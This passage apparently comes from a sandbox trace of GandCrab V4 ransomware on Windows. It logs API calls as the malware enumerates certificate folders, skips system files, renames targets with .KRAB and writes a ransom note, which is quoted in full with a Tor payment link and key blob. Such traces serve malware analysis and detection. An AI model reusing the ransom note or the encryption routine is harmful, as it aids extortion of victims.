KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0062.140] WriteFile (in: hFile=0x440, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338e820, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338e820*=0x1f6e, lpOverlapped=0x0) returned 1 [0062.141] CloseHandle (hObject=0x440) returned 1 [0062.141] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.141] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0062.142] GetSystemTime (in: lpSystemTime=0x2ea0400 | out: lpSystemTime=0x2ea0400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x9, wMilliseconds=0x150)) [0062.142] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0062.142] GetWindowsDirectoryW (in: lpBuffer=0x2f30000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0062.142] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f30200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f30600, lpMaximumComponentLength=0x2f30608, lpFileSystemFlags=0x2f30604, lpFileSystemNameBuffer=0x2f30400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f30600*=0xd2ca4def, lpMaximumComponentLength=0x2f30608*=0xff, lpFileSystemFlags=0x2f30604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0062.142] wsprintfW (in: param_1=0x2ea0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\d2ca4a08d2ca4dee3d.lock") returned 93 [0062.143] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\systemcertificates\\my\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x440 [0062.143] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.143] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.144] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\") returned 70 [0062.144] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\*" [0062.144] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\*", lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 0xfbd720 [0062.144] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0062.144] FindNextFileW (in: hFindFile=0xfbd720, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0062.144] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0062.144] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0062.144] FindNextFileW (in: hFindFile=0xfbd720, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0062.144] lstrcmpW (lpString1="AppContainerUserCertRead", lpString2=".") returned 1 [0062.144] lstrcmpW (lpString1="AppContainerUserCertRead", lpString2="..") returned 1 [0062.144] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\", lpString2="AppContainerUserCertRead" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\AppContainerUserCertRead") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\AppContainerUserCertRead" [0062.144] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0062.145] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\AppContainerUserCertRead.KRAB") returned 99 [0062.145] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\AppContainerUserCertRead") returned 94 [0062.145] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\AppContainerUserCertRead") returned 94 [0062.145] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\AppContainerUserCertRead") returned 94 [0062.145] lstrcmpiW (lpString1="AppContainerUserCertRead", lpString2="desktop.ini") returned -1 [0062.145] lstrcmpiW (lpString1="AppContainerUserCertRead", lpString2="autorun.inf") returned -1 [0062.145] lstrcmpiW (lpString1="AppContainerUserCertRead", lpString2="ntuser.dat") returned -1 [0062.145] lstrcmpiW (lpString1="AppContainerUserCertRead", lpString2="iconcache.db") returned -1 [0062.145] lstrcmpiW (lpString1="AppContainerUserCertRead", lpString2="bootsect.bak") returned -1 [0062.145] lstrcmpiW (lpString1="AppContainerUserCertRead", lpString2="boot.ini") returned -1 [0062.145] lstrcmpiW (lpString1="AppContainerUserCertRead", lpString2="ntuser.dat.log") returned -1 [0062.145] lstrcmpiW (lpString1="AppContainerUserCertRead", lpString2="thumbs.db") returned -1 [0062.145] lstrcmpiW (lpString1="AppContainerUserCertRead", lpString2="KRAB-DECRYPT.html") returned -1 [0062.145] lstrcmpiW (lpString1="AppContainerUserCertRead", lpString2="KRAB-DECRYPT.txt") returned -1 [0062.145] lstrcmpiW (lpString1="AppContainerUserCertRead", lpString2="CRAB-DECRYPT.txt") returned -1 [0062.145] lstrcmpiW (lpString1="AppContainerUserCertRead", lpString2="ntldr") returned -1 [0062.145] lstrcmpiW (lpString1="AppContainerUserCertRead", lpString2="NTDETECT.COM") returned -1 [0062.145] lstrcmpiW (lpString1="AppContainerUserCertRead", lpString2="Bootfont.bin") returned -1 [0062.146] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.147] FindNextFileW (in: hFindFile=0xfbd720, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0062.147] lstrcmpW (lpString1="Certificates", lpString2=".") returned 1 [0062.147] lstrcmpW (lpString1="Certificates", lpString2="..") returned 1 [0062.147] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\", lpString2="Certificates" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates" [0062.147] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\" [0062.147] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2ea0000 [0062.147] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0062.147] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0062.147] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0062.147] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0062.147] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.148] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0062.148] wsprintfW (in: param_1=0x2ea0200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\\\KRAB-DECRYPT.txt") returned 100 [0062.150] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\systemcertificates\\my\\certificates\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x448 [0062.151] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0062.151] WriteFile (in: hFile=0x448, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338e5a0, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338e5a0*=0x1f6e, lpOverlapped=0x0) returned 1 [0062.151] CloseHandle (hObject=0x448) returned 1 [0062.152] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.152] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0062.152] GetSystemTime (in: lpSystemTime=0x2ea0400 | out: lpSystemTime=0x2ea0400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x9, wMilliseconds=0x160)) [0062.153] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0062.153] GetWindowsDirectoryW (in: lpBuffer=0x2f30000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0062.153] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f30200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f30600, lpMaximumComponentLength=0x2f30608, lpFileSystemFlags=0x2f30604, lpFileSystemNameBuffer=0x2f30400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f30600*=0xd2ca4def, lpMaximumComponentLength=0x2f30608*=0xff, lpFileSystemFlags=0x2f30604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0062.153] wsprintfW (in: param_1=0x2ea0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\d2ca4a08d2ca4dee3d.lock") returned 106 [0062.153] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\systemcertificates\\my\\certificates\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x448 [0062.154] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.154] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.155] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\") returned 83 [0062.155] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\*" [0062.155] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\*", lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 0xfbd6a0 [0062.155] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0062.155] FindNextFileW (in: hFindFile=0xfbd6a0, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 1 [0062.155] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0062.155] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0062.155] FindNextFileW (in: hFindFile=0xfbd6a0, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 1 [0062.155] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0062.155] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0062.155] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\d2ca4a08d2ca4dee3d.lock" [0062.155] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0062.156] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 111 [0062.156] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\d2ca4a08d2ca4dee3d.lock") returned 106 [0062.156] lstrlenW (lpString=".lock") returned 5 [0062.156] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0062.156] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".lock ") returned 6 [0062.156] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.156] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.157] FindNextFileW (in: hFindFile=0xfbd6a0, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 1 [0062.157] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0062.157] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0062.157] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\KRAB-DECRYPT.txt" [0062.157] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0062.157] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\KRAB-DECRYPT.txt.KRAB") returned 104 [0062.160] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\KRAB-DECRYPT.txt") returned 99 [0062.160] lstrlenW (lpString=".txt") returned 4 [0062.160] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0062.160] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".txt ") returned 5 [0062.161] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.161] lstrlenW 